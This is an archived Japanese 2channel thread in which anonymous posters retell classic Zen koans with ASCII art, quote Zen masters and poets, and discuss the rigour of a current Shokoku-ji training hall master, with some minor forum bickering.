364 :名無しさん@京都板じゃないよ:2006/12/12(火) 01:32:49
さんごちんしょうりょうこうのなみだ

365 :名無しさん@京都板じゃないよ:2006/12/13(水) 16:19:22
      ∧∧
〜′ ̄ ̄(,,゚Д゚)存在してると見えてるものは、実は、存在していないんだニャー
  UU ̄U U


   ∧∧
   (,,゚Д゚)ひとは、60兆個の細胞の集合に過ぎないミャー
  /  |
〜OUUつ


  ∧ ∧∧ ∧
  (゚Д゚≡゚Д゚)縁、条件に従って、集められたんだニャー
   ./  |.
  (___/
 /


  ∧ ∧∧∧
 (゚Д゚≡゚Д゚)
   |し |つ  なにもないところは、すべてが、存在しているミャー
  ⊂__ |
     し'

  ∧∧
  (,,゚Д゚)
 ⊂  つ ワー らくだが、針の穴を通ってるニャー
  0  |〜
   `J

366 :名無しさん@京都板じゃないよ:2006/12/13(水) 16:20:10
【 隻手の音声せきしゅのおんじょう】    『 かたてのひとがたたくはくしゅのおとをきけ 』
______            ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄
        \  ∧_∧   ( ´∀` )<片手の人がたたく
拍手の音を聞け>( ・∀・ )  (○┳○) \_______
______/ (○┳○)  /  /  /
            ヽ ヽ ヽ (_(__)
            (__)_)    

            ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
           ( ・∀・ )  <片手では、拍手できないよぉ〜 
           (○┳○)   \ 音、出ないよぉ〜
            ヽ ヽ ヽ     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            (__)_)
                         _______
            ∧_∧ ∧_∧  / こんにゃろうめ
           ( ・∀・ )( ´∀`)<   そんなの誰も知ってる訳
            (○┳○)┳○)   \ 聞こえねーじゃねーか
            ヽ ヽ ヽ/ /       \にゃろめー
             (__)_) )        ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

            ∧_∧    /  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
           ( ・∀・ )  < 自分だけ、
           (○┳○)   \ 人間だけって無いんだよ
            ヽ ヽ ヽ     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            (__)_)
                         _______
            ∧_∧ ∧_∧  /海の波、白い手を挙げている
           ( ・∀・ )( ´∀`)< 波が起こり消えるまでが、一生  
            (○┳○)┳○)  \ 死ねば、また、海に
             ヽ ヽ ヽ/ /     \生れたら、又、波の白い手に 
             (__)_) )        ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

367 :名無しさん@京都板じゃないよ:2006/12/13(水) 19:39:43
      ∧∧
〜′ ̄ ̄(,,゚Д゚)存在してると見えてるものは、実は、存在していないんだニャー
  UU ̄U U


   ∧∧
   (,,゚Д゚)ひとは、60兆個の細胞の集合に過ぎないミャー
  /  |
〜OUUつ


  ∧ ∧∧ ∧
  (゚Д゚≡゚Д゚)縁、条件に従って、集められたんだニャー
   ./  |.
  (___/
 /


  ∧ ∧∧∧
 (゚Д゚≡゚Д゚)
   |し |つ  なにもないところは、すべてが、存在しているミャー
  ⊂__ |
     し'

  ∧∧
  (,,゚Д゚)
 ⊂  つ ワー らくだが、針の穴を通ってるニャー
  0  |〜
   `J


368 :名無しさん@京都板じゃないよ:2006/12/13(水) 21:06:04
          ,、‐ ''"  ̄ ``'' ‐- 、              
        /イハ/レ:::/V\∧ド\                
       /::^'´::::::::::::i、::::::::::::::::::::::::::::\   
     ‐'7::::::::::::::::::::::::ハ:ハ::|ヽ:::;、::::::::::::丶   
     /::::::::::::::/!i::/|/  ! ヾ リハ:|;!、:::::::l      
    /´7::::::::::〃|!/_,,、   ''"゛_^`''`‐ly:::ト     
      /|;ィ:::::N,、‐'゛_,,.\   ´''""'ヽ  !;K          
        ! |ハト〈  ,r''"゛  ,       リイ)|          
          `y't     ヽ'         //            
         ! ぃ、     、;:==ヲ   〃             ,-v-、   
         `'' へ、   ` ‐ '゜   .イ            / _ノ_ノ:^)  
              `i;、     / l           / _ノ_ノ_ノ /)  
                〉 ` ‐ ´   l`ヽ          / ノ ノノ//    
            / !        レ' ヽ_     ____  /  ______ ノ
                          ("  `ー" 、    ノ  
                           ``ー-、   ゙   ノ 
                            ( `ー''"ー'"   
                              \ /ノ
片手の人がたたく 拍手の音を聞きなさい。

369 :名無しさん@京都板じゃないよ:2006/12/14(木) 19:08:20
              ∧∧ ∩ 「洞山麻三斤とうざんまさんぎん」
              ( ´∀`)/
             ⊂   ノ
             (つ ノ  ∧∧ ∩ 僧、問う
             (ノ  ( ´∀`)/「如何なるか、是れ仏」
                _| つ/ヽ-、_
              / └-(____/

                  <⌒/ヽ___ 山、答えて曰く
                /<_/____/「麻三斤」

                          (゚д゚ ) ほとけとは、どんなものですか?
                  <⌒/ヽ-、__ノヽノ |
                /<_/____/ < <

                            (゚д゚ )
                  <⌒ヽ_ /ヽ-、__ノヽノ | ほほー丁度私が腕に抱えている麻布の重さが、三斤だよ 
                /<___ノ/____/ < <

                               (゚д゚ )えー、麻が、ほとけなのだろうか?
                  <⌒ヽ    /ヽ-、__ノヽノ |
                /<___ノ ̄ ̄/____/ < < ほとけが、麻なのだろうか?

                                ( ゚д゚ )
                  <⌒ヽ    /ヽ-、__ノヽノ | どちらなのだろうか?
                /<___ノ ̄ ̄/____/ < <

                    _             ( ゚д゚ )
                  <'゚ 3ヽ     /ヽ-、__ノヽノ | ほとけとは、三斤の重さの麻布、だ。
                /<`゚__ノ ̄ ̄/____/ < <

370 :名無しさん@京都板じゃないよ:2006/12/15(金) 19:12:03
  / ̄\      白馬と白芦     / ̄\
  |/ ̄ ̄ ̄ ̄\           / ̄ ̄ ̄ ̄\|
 |   /V\\\          |  /V\\\ 
 | / /||  || |           | //|   || |
 | | |(゚)   (゚)| |           | | (゚)   (゚) /|  白馬入芦花
ノ\|\| ( _●_) |/           \| ( _●_) |/|/\ はくばにゅうろか
 彡、   |∪|  、` ̄ ̄ヽ    /彡、   |∪|  ミ  \
/ __  ヽノ   Y ̄)  |   (  (/     ヽノ_  |\_>白馬 芦花に 入る
(___)       Y_ノ    ヽ/     (___ノ    はくば ろかに はいる
     \      |       |      /
      |  /\ \     / /\  |
      | /    )  )    (  (    ヽ |
      ∪    (  \   /  )    ∪
            \_)  (_/
白色と言う点で、白馬と白芦は、平等です。
とは言え、白馬と、白芦は、異質です。


371 :名無しさん@京都板じゃないよ:2006/12/15(金) 19:35:22
>>30
___               【  カクテル3杯目、半額セール実施中 ! 12月いっぱい !  】      
  ||/ΛΛ/凹凹/∩∩/    ||  /     ___ ∧ ∧
  ||■■/目目/ΥΥ/|    ||/    /      (゚Д゚ ,,)   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ||■/凸目/ΥΥ/  |    /     / 凹 Y/⊂  ヽ  <ねぇマスター、寺の門前に痩せ狗がいマスター!
  ||/凸凵/ΠΠ/    |  /     /     ∧_∧(___,)〜 \_________________
  ||凸凵/▲▲/|    |/     /     (ω・  ) ┳┛
  ||凵/日日/  |   /     /  凹 Yと     l  ┃  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ||/ΔΔ/ ∧_∧/     /   ∧_∧ i⌒,___) ┻ <生きとし生けるものには、ことごとく仏性が有るとか
  ||廿廿/| ( ;´Д)    /     (∀・   )(_)┳┛    \__________________
  ||廿/  | (.    つ   / 凹  Y と    l     ┃
  ||/    |  | 〇 .|  /     / i⌒ ,.__)   ┻/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ||      | (__(__)/     /  (_) ┳┛   <門前の痩せ狗にも仏性があるのか,ないのかなぁ〜
  ||    /      /     /         ┃      \____________________
  ||  /  ∧  /     /   ┏━┓  ┻
_||/   /   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      | 山川草木国土悉無仏性(ぜんうちゅうにぶっしょうはない)仏性は無いに決まってんじゃん♪狗じゃん
      \_____________________________________


372 :名無しさん@京都板じゃないよ:2006/12/16(土) 01:31:17
 おっ!
  /⌒ヽ   
 ( ^ω^)夏、和尚と弟子が商量している。
O┬O )    和尚、蚊に喰われたあとをポリポリ掻きながら、言いました。
◎┴し'-◎ ≡ キキーッ
「おまいさん、今、蚊に喰われたどうするね」
         _____
         (\  ∞   ノ弟子さん、これまた、蚊に喰われたあとをポリポリ掻きながら
         ヽ、ヽ    / 「はぁ〜、え〜と、まだぁ〜、考えていません」
 ぱんてぃ〜!  `ヽ)⌒ノ            
それとも、パンティ〜?

373 :名無しさん@京都板じゃないよ:2006/12/16(土) 02:52:49
ほとけ    ∧∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
こころ   (゚д゚,,)   < 本来面目ほんらいのめんもく
カリカリ・・・_,φと ヽ_  \自分の中のもう一人の自己
,, ,, ,,,/ [] ̄^''/┃,, ,, ,,,\本地ほんじの風光
,, '' ,,┣┳━━┫ ┃ ,, ''' ,, ,,\主人公
,, '' ,,┃/ ̄ ̄┃,/,, ,, '' ,, ''  \無位の真人
,,'' ,,,~ '' ,, '' ,,~ ,,, '' ,, ''' ,,,    \________


374 :名無しさん@京都板じゃないよ:2006/12/16(土) 22:55:08
+破草鞋はそうあい
      +         +     +あなたの破れて使えなくなった靴って、なに?
  +       ∩∩
.      .  / ̄\  +. ((( )))  +
        ( ´∀`)   (´∀` )
        (つ  つ θθ つ  つc■
.     +  ( ヽノ 草鞋 ( ヽノ        +
        し(_)     し(_)
若山牧水「草鞋わらじ」
草鞋よ おまえもいよいよ切れるか
今日 昨日 一昨日 これで三日間 はいてきた
はき上手の私と できの良いおまえと 二人で越えてきた
山川のあとをしのぶに 捨てられぬ思いもぞする なつかしき これの草鞋よ

375 :名無しさん@京都板じゃないよ:2006/12/18(月) 15:08:08
 *     +    巛 ヽ
            〒 !   +    。     +    。     *     。
      +    。  |  |
   *     +   / /   イヤッッホォォォオオォオウ!
       ∧_∧ / /
      (´∀` / / +    。     +    。   *     。
      ,-     f
      / ュヘ    | *     +    。     +   。 +
     〈_} )   |
        /    ! +    。     +    +     *
       ./  ,ヘ  |
 ガタン ||| j  / |  | |||
――――――――――――
随処作主 立処皆真 ずいしょさしゅ りっしょかいしん
随処に、主となれば、立処、みな真なり

自分の置かれた場所で、隙の無いように精一杯やるなら、どこにあっても、真実のいのちに巡り会える。

376 :名無しさん@京都板じゃないよ:2006/12/18(月) 18:45:28
ソォー
|⊂⊃;,、  両忘りょうぼう
|・д・)   生死を忘れる
|⊂ノ】   相対を忘じ尽くす
|-J     相対を空ず

有無生死、空。

377 :名無しさん@京都板じゃないよ:2006/12/19(火) 00:31:21
片手の人がたたく、拍手の音を聞け。
   、ヾ'"'';          /ゝ
   ミ  彡    wWw _/´  `ヽ  ビクッ!
   ミ  彡  、ヾ   ヾ/      ,! Σ
.   ミ  ミ  ミ      ゝ   o,  oミ   
    ミ ミ ミ         `ミ __,xノ゙、        
    ミ  ミ ミ     ミ     ヽ.._,,)))        
    ヾ、  !       ミ  i                
     ´"'`、     ミ ヽ.    、ゞヾ'""''ソ;μ,    
.        ` ーー -‐''ゝ、,,))  ヾ  ,' 3    彡  >> ブワッ!
                   ミ        ミ
                    彡        ミ
                    /ソ,, , ,; ,;;:、ヾ`

> 右手か? 左手か?
(笑)  で、どちらの手が、鳴ったのですか?


378 :名無しさん@京都板じゃないよ:2006/12/20(水) 00:30:11
普化ふけ は、常に、街の中で鐘を鳴らして、叫んだ。

  ○_○  カシコイ頭ガ、来タナラバ、カシコイ頭ヲ、ウッテヤレ
 ( *・(ェ)・)  オロカナ頭ガ、来タナラバ、オロカナ頭ヲ、ウッテヤレ
 ( ∪ ∪  四方八面、来タナラバ、ツムジノヨウニ、ウッテヤレ
 と__)__)旦~ オオキナ空ガ、来タナラバ、豆打チ棒デ、ウッテヤレ


379 :名無しさん@京都板じゃないよ:2006/12/20(水) 03:23:21
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|片手の人がたたく 拍手の音を聞け〜!!

   ̄ ̄|/ ̄|/ ̄|/ ̄|/ ̄|/ ̄|/ ̄ ̄ ̄ ̄ ̄
  ∧_∧     ∧_∧     ∧_∧ .∧_∧     ∧_∧     ∧_∧
  ( ・∀・∧_∧ ・∀・∧_∧ ・∀・)( ・∀・∧_∧ ・∀・∧_∧・∀・
  ∧_∧ ・∀・) ⊃ ( ・∀・∧_∧ ..∧_∧・∀・ ) ⊃ (・∀・ ∧_∧
  ( ・∀・∧_∧    ∧_∧ ・∀・)( ・∀・∧_∧    ∧_∧・∀・ )
  ∧_∧ ・∀・∧_∧ ・∀・∧_∧ ∧_∧ ・∀・∧_∧(・∀・∧_∧
  ( ・∀・) ⊃ ( ・∀・) ⊃ ( ・∀・)( ・ ∧∧l||l .(・∀・ )⊂  (・∀・ )
 (  ⊃ )   (  ⊃ )   (  ⊃ )   (#゚Д゚)  ( ⊂  )´・∀・`)∧_∧
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ (つ_つ__   ∧_∧(・∀・ )
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄日∇ ̄\| VAIO |\(・∀・ )∧_∧
                         ̄   =======  \⊂  (・∀・ )
             片手の拍手って、キコエナイでしょ?!


380 :名無しさん@京都板じゃないよ:2006/12/20(水) 14:07:22
隻手の音声 せきしゅのおんじょう

  片手の人がたたく、拍手の音を聞け!!
 (⌒) .(⌒)   (⌒) .(⌒)   (⌒) .(⌒)
 ( ´・●・)つ ( ´・●・)つ ( ´・●・)つ
 ( 二つ    ( 二つ    ( 二つ
  \./ /、    \./ /、    \./ /、
    ∪`J      ∪`J      ∪`J
 空を切るだけじゃん、手を打っても・・・


381 :名無しさん@京都板じゃないよ:2006/12/20(水) 20:36:03
  投子とうす     僧
     ∧_∧    ∧_∧   |
___( ´∀`)__(・∀・ )___.| 
\\ /    つ目 ( つ目)\\\  
\ ⊂ノヽ ヽ ヽ\\ヽ ヽ ヽ \\\  
===(_):_)==(_):_) ===
::::| |::::::::::::::::::::::::::::| |::::::::::::::::::::::::::::| |::
 """       """       """" 

僧、問う「朝、鶏がまだ鳴かないときは、どうですか?」

投子、答える「何の音沙汰もない、天地静寂だよ」

僧、更に問う「鳴いたあとは、どうですか?」

投子、答える「各自が、あぁ、夜が明けたと時を知るだけだ」


382 :名無しさん@京都板じゃないよ:2006/12/21(木) 18:01:33
          洞山麻三斤とうざんまさんぎん
                               +
.      +   ∧_∧ ∧_∧ ,∧_∧  +
         ( ゚゚∀∩(゚゚∀∩)( ゚゚∀゚゚)
    +  (( (つ   |(つ   |( つ  つ ))  +
          ヽ ( ノ ノ ( ヽノ ) ) )
          (_し' し (_) (_)_)
          1斤   2斤   3斤
洞山の守初がある日、麻の目方を量っているところへ、一人の僧がやってきて、質問しました。
「ほとけ とはどんなものですか?」

洞山は、答えました。
「この麻は、三斤あるよ」 


383 :名無しさん@京都板じゃないよ:2006/12/22(金) 02:51:47
         ミ      隻手の音声せきしゅのおんじょう
       /ミヽ.    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        ( ^ω^) <  片手の人がたたく拍手の音を聞いてこい!
 ピョン   ( O┳O)    \ 聞こえるの ? 聞こえないよ ?
  ピョン   し-||-J     \________________
       ⊂§⊃  
         §    ∬                         ∬
 ⌒ヽ〃⌒ヽ〃     旦                        C■


384 :名無しさん@京都板じゃないよ:2006/12/25(月) 18:45:22
      _   (⌒Y´ ̄ヽ  ∧_/( ̄)) ∧_∧
    γ´  `ヽ_`と.__   )( ・ ∩( 《 ( ・∀・)  ゴロン
     )) ,、 , ) <、_,.ノ  ヽ、.__,ノ  l  つ つ
    ((_/し∪V              .ヽ.__ノ!__)) ゴロン
  ∧__∧       ∧_∧          ∧_∧
 (    )       ( ;´Д`)        (・∀・ )
 (    つ     (U_U )つ       (つ  と)
 .ヽ___ノj                   (⌒Y⌒)
    ∧__∧                . / ̄ヽ ̄
   (・    )           __    ( __  ) (  ゴロン
    と   ヽ ( ̄))∧_∧  /´ `Y⌒) VUVJ_)
    (__ト、__丿 〉 》∩ _) (   .__つ´
          ヽ、.__,ノ   ヽ、__,.>
隻手の音声 せきしゅのおんじょう

  片手の人がたたく、拍手の音を聞け ! !

って、音が、でないでしょう?
音が出ないものを、どうやって聞けと言うの ?

385 :名無しさん@京都板じゃないよ:2006/12/27(水) 01:52:41
http://www.zenbunka.or.jp/03_magazine/katatumuri/databox/kata007.htm

∧_∧゚∀゚;) ∧_∧ ∧_∧ (゚∀゚;)∧_∧∧_∧∧_∧( ゚∀゚ ) ∧∧
 ゚∀゚ .)ヽ_∧ ∧∧( ゚∀゚*.) ∧_∧∧_∧( ゚∀゚ .O゚∀゚;)∧_∧(,,゚∀゚)
∧_∧ ;゚∀゚)(゚∀゚,,)∧_∧ .( ゚∀゚ )∧_∧∧_∧∧_∧∧∧∧_∧
∧_∧∧_∧_∧ ( ゚∀゚;).つ∧∧_∧ ∀゚)∧∧ ( ゚∀゚ )∧_∧∧∧
( ゚∀゚ )  ゚∀゚)∧_∧∧_∧(#゚∀゚) ∧_∧ (゚∀゚,,)∧_∧∧_∧゚ )∩
∧_∧∧_∧( ゚∀゚ )∧_∧∧_∧ ゚∀゚; )∧_∧ ゚∀゚ )∧∧∧_∧
 ゚∀゚ .)∧_∧∧∧  つ ゚∀゚∧_∧∧_∧∧∧∀゚)∧_∧∧_∧∧_∧
∧_∧O ゚∀゚ )∧∧  |\ ∧ ゚∀゚;)∧_∧∧_∧∧_∧∧ ゚∀゚*)∧∧
、 ゚∀゚*) _∧ (#゚∀゚) |  \_人_人_从_人ノヽ_人_人_ ∧∧∧_∧∧_∧
∧_∧ ゚∀゚ )∧_∧ )                 て ,,゚∀゚)∧_∧゚∀゚ )
 ゚∀゚ )∧_∧∧∧゚   )隻手の音声を聞いてこい!  ∧_∧∧_∧∧∧
∧_∧ ;゚∀゚)゚∀゚)  )                ( (゚∀゚∧)∧゚∀゚)∧_∧
( ゚∀゚ )_∧∧_∧  ⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒∧∧∧_∧∧_∧
∧_∧゚∀゚;)∧_∧ ∧_∧( ゚∀゚;)∧_∧∧_∧ (゚∀゚,,)∧_∧;゚∀゚ )
 ゚∀゚ )ヽ_∧ ∧∧(゚∀゚ *) ∧_∧∧_∧ ゚∀゚ O∧_∧∧_∧∧_∧
  ∧∧   ゚∀゚)(゚∀゚,,)∧_∧ (  ゚∀゚)∧_∧∧_∧∧_∧( ゚∀゚ )∧∧

386 :名無しさん@京都板じゃないよ:2006/12/29(金) 00:21:01
       (´・ω・`) 無明とは明らかになしと申す文字にて候(沢庵)
  ((  (´・ω・`)(´・ω・`)
    (´・ω・`)  (´・ω・`)
 (( (´・ω・(´・ω・`)・ω・`) ))
    (´・ω・`)  (´・ω・`)
     (´・ω・`)(´・ω・`) ))
       (´・ω・`)

 無明とは明らかになしと申す文字にて候

 沢庵宗彭禅師(1573〜1645)の著、『不動智神妙録』の冒頭の一句である。
沢庵が柳生但馬守に示した剣禅一致を説いた書物である。
 沢庵はいう。人生は、そもそもが、無明なのだ。未知なのだ。
だから人生は、迷うことだと。
迷うから人生なのだけれど、その道を究めつくした達人たるものは、いつまでも迷ってはおられないのだと示している。


387 :名無しさん@京都板じゃないよ:2006/12/30(土) 00:45:38
はあ?(°□°)

388 :名無しさん@京都板じゃないよ:2006/12/30(土) 00:52:33
387 名前:名無しさん@京都板じゃないよ 投稿日:2006/12/30(土) 00:45:38
はあ?(°□°)

389 :名無しさん@京都板じゃないよ:2006/12/30(土) 01:04:38
                   _∬_
                  (⌒⌒)\≠/
               |___| ∩ ̄    平常心是道
              (*‘ω‘ *) ノ ≡=−     (´´    
               /ゝ: ヽ  _ __ _   (´⌒(´⌒;;
              0┬ゝ  )= ≡=− (´⌒;;;
              (*)(_/(*) (´⌒(´⌒;;
                   チリンチリン

【平常心是道】びょうじょうしんこれどう

 趙州(じょうしゅう)がまだ修行中の頃、師匠である南泉(なんせん)に、こう尋ねました。
「仏道の道とは、いったいなんでしょうか?」

 南泉は、馬祖(ばそ)の言葉を用いてこう答えた。
「平常心(普段の心)が道だ」

「なるほど、その平常心を目標として努力すればよろしいのですね」

「いや、目標とすれば道をそれてしまうだろう」

「しかし、目標がなければ、道を求めること、道を知ることができませんよ」

「趙州よ、道とは、知るとか知らないとかいった問題には属さないのだ」


『無門関』第十九則


390 :現代の公案:2006/12/30(土) 07:51:49
禿の髪の毛で日本髪を結え

391 :名無しさん@京都板じゃないよ:2006/12/30(土) 16:22:47
【倶胝竪指】ぐていじゅし

 どんな質問をされても、ただ指を1本立てるだけの倶胝(ぐてい)という和尚がいました。
ある時、和尚の留守に来た客が留守番をしていた小僧に、法の説き方を尋ねました。すると小僧は和尚のマネをして指を1本立てて見せたのです。

 この事をあとで聞いた和尚は、小僧のその指を切り落としてしまいました。あまりの痛さに泣き叫ぶ小僧に、和尚は言いました。
「おい、こっちを見ろ!」

 小僧が見ると、和尚は指を1本立てていました。その瞬間、小僧は悟ったという。


『碧巌録』第十九則

          ,.-―┬-、
         /,. z===、ノ
         `i ハノヽハ〉
         ヾゝ!|,,゚ ヮ゚ノi_   
           (_iつ_/__/
   ミ ≡z 、__く_f⌒)^)_____
   彡≡-'´ ̄ ̄`(_ノし' ̄ ̄ ̄ ̄



          ニ三三三ニ

392 :名無しさん@京都板じゃないよ:2007/01/05(金) 00:31:05
坐禅と見性第50章 公案と見性B流れる水
http://life8.2ch.net/test/read.cgi/psy/1167920142/

393 :名無しさん@京都板じゃないよ:2007/01/06(土) 20:05:09
♪  ∧_∧
   ( ´∀` )))
 (( ( つ ヽ、   ♪ 銀椀♪
   〉 と/  )))       雪〜♪
  (__/^(_)

銀椀裏盛雪(ぎんわんりにゆきをもる)

【本則】
挙(こ)す。僧、巴陵(はりょう)に問う、
 「如何なるか是れ提婆宗(だいばしゅう)」。
巴陵云く、「銀椀裏(ぎんわんり)に雪を盛る」。

【本則】
提案。僧が、巴陵鑑に聞いた、
 「迦那提婆の宗旨の根本は何ですか」。
巴陵は云った、「白い椀に白い雪を盛るように、見分けがつかぬが全くちがうものだ。」
 
【頌】
老新開、端的に別なり、
解(よ)くぞ道(い)えり、銀椀裏に雪を盛ると。

九十六箇応(まさ)に自知すべし、知(さと)らずんば却って天辺の月に問え。

提婆宗、提婆宗、赤旛(しゃくばん)の下清風を起こす。

【頌】

巴陵先生、まさしく格別である。「銀の椀に雪を盛る」とはよくぞおっしゃった。
九十六種の外道も思い知ったにちがいない。
悟らなければ天の月に尋ねてみなさい。
提婆宗よ、提婆宗よ。赤い旛の下には清涼な風が吹き起こる。

394 :名無しさん@京都板じゃないよ:2007/01/10(水) 03:01:17
      □  +   +    *          /\  
      □   ∧渡∧ +          /  . .\   
      ‖  (0゚・∀・) ワクワク     /      \  
   __‖  (0゚∪ ∪+ テカテカ   @    .  .  . \ 
   \三三三三三三三三三三三三三三|   . .   .  \ 
~~~~~〜~~~〜~~~〜〜~~~~〜~~~~〜〜~~〜~〜~〜~~~~〜〜~\~~~〜~~~〜゚マグロ~~~〜~~~〜〜~~~~〜~~~~〜〜~~~
                                   .  \   ∠@》))))))\/| ≡ 
                                      [ガッ] < 》凵j)))〆ソ ≡ 

花薬欄(碧巌録) かやくらん

 『碧巌録』第三十九則に「雲門花薬欄」という公案があります。


挙(こ)す。僧、雲門に問う、「如何(いか)なるか是(こ)れ清浄法身(しょうじょうほっしん)」。

門曰(いわ)く、「花薬欄」。


 雲門文偃(ぶんえん)禅師(八六四〜九四九)に一人の僧が問います。

「煩悩妄想(ぼんのうもうぞう)がすっかりなくなった美しい清浄な悟りの本体とはどんなものでしょうか」。
雲門、答えて曰く、「花薬欄」(花畑)。


395 :名無しさん@京都板じゃないよ:2007/01/17(水) 21:21:21
       ζ
      _,,.□D_          ∧,,.∧
     ./ ・ω・ヽ        ./・ω・ ヽ 
     l      l       ζl      l
     `'ー---‐´  o  □⊃`'ー---‐'′
     隻手の音声(せきしゅのおんじょう)

片手の人がたたく拍手の音を聞いてこい ! !


396 :名無しさん@京都板じゃないよ:2007/01/20(土) 21:24:48
【三十八則】 牛、窓れい過ぐ(牛過窓れい)
五祖が言う、
「たとえば水牛が通り過ぎるのを、窓の格子越しに見ていると、頭、角、前脚、後脚とすべて通り過ぎてしまっているのに、どういうわけで尻尾だけは通り過ぎないのだろうか?」




これは、しっぽであると、思う知識が、邪魔をしている。
これは、頭、これは、手、と言うものはない。

水牛は、水牛としての全体である。


397 :名無しさん@京都板じゃないよ:2007/02/09(金) 17:39:35
長岡禅塾、南禅僧堂、相國僧堂、と歴代の師家について修行を積まれた田中芳州老大師が師家をつとめる現代の相國僧堂は凄まじく厳しいよ。

398 :名無しさん@京都板じゃないよ :2007/02/09(金) 17:52:05
らしいね。
それは評席のせいだよ。

399 :名無しさん@京都板じゃないよ:2007/02/09(金) 18:03:12
田中老師は、常に雲水に喝を入れておられるよ・・・。坐禅してても作務してても読経してても・・・。凄く恐い。自分に厳しく他人に易しい人なんか居ない。自分に厳しい人は他人にも厳しい。

400 :名無しさん@京都板じゃないよ:2007/02/09(金) 18:16:49
凄く厳しい田中老師は素晴らしい師家だと思う。

401 :名無しさん@京都板じゃないよ:2007/02/09(金) 18:21:30
見た目が易しそうな人ほど恐いからね。

402 :名無しさん@京都板じゃないよ :2007/02/09(金) 18:38:37
老師からのストレス発散に雲水が暴力に走るんじゃねえの。

403 :名無しさん@京都板じゃないよ:2007/02/09(金) 19:03:39
禅導師のストレス発散がこの「暴力」カキコだろ。
去年のフォモ荒しだな。

404 :名無しさん@京都板じゃないよ:2007/02/09(金) 19:33:58
>>403 ←思い込み激しい勘違い馬鹿W

405 :名無しさん@京都板じゃないよ:2007/02/20(火) 17:37:03
相國僧堂 橋本玄義禅師の法脈を嗣いでいるのは長岡禅塾、國泰僧堂、妙興僧堂、大乗僧堂、崇福僧堂とかだと思うんだが?

406 :名無しさん@京都板じゃないよ:2007/02/20(火) 18:28:56
〜天下の鬼叢林 相國僧堂 師家伝〜

たなかほうじゅう 田中芳州 昭和二十四年〜(一九四九〜)
道号は芳州、法キは宗唯。
室号はネン華室。
俗称田中。
大阪市北区出身。
大学院在学中より長岡禅塾の森本省念老師に師事。
その後、二十七歳のとき、大徳寺塔頭興臨院山口和尚につき得度。
昭和五十三年(一九七八)、南禅僧堂に掛塔。
同五十九年、興臨院副住職となるが、参禅の師勝平宗徹老師ならびに授業師山口和尚の遷化を機に、南禅寺山内南陽院の鈴木正澄和尚の徒弟となり、相國僧堂の梶谷宗忍老師のもとに再掛塔、通参を経て、平成六年(一九九四)、嗣法する。
同七年三月より僧堂師家。

407 :名無しさん@京都板じゃないよ:2007/02/22(木) 18:28:38





            男に「二言」はあっていい






408 :名無しさん@京都板じゃないよ:2007/02/23(金) 21:31:47
靖国講座中止は、右翼のおかげだな。


409 :名無しさん@京都板じゃないよ:2007/02/23(金) 21:33:41
そういえば、昨日だったか、中止の案内来てたな。

410 :名無しさん@京都板じゃないよ:2007/03/01(木) 07:09:52
シコシコドピュドピュ!!!!!(°□°;

88 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)